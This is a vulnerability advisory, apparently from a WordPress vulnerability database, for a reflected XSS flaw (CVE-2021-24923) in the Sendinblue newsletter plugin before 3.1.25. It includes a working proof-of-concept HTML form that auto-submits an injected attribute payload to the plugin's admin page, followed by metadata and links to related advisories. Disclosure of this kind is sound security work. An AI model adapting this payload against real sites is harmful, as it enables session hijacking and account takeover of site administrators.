Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.25 – Reflected XSS | CVE 2021-24923 | Plugin Vulnerabilities

Description

The plugin does not escape the sib-statistics-date parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=sib_page_statistics" id="hack" method="POST">
      <input type="hidden" name="sib-statistics-date" value='2021 - 2021 - " onmouseover=alert(/XSS/) style=width:100%;height:3000px test="' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Fixed in 3.1.25

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

3afef591-9e00-4af8-a8a6-e04ec5e61795

Timeline

Publicly Published

2021-12-23 (about 4 years ago)

Added

2021-12-23 (about 4 years ago)

Last Updated

2022-09-26 (about 3 years ago)

Other

Published

Title

Published

2025-04-30

Title

Remote Images Grabber <= 0.6 - Reflected Cross-Site Scripting

Published

2024-04-02

Title

Jeg Elementor Kit < 2.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Image Box

Published

2014-08-01

Title

NextGEN Gallery <= 1.5.1 - Cross-Site Scripting (XSS)

Published

2024-12-11

Title

Kundgenerator < 1.0.7 - Reflected Cross-Site Scripting

Published

2025-03-07

Title

Years Since – Timeless <= 1.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting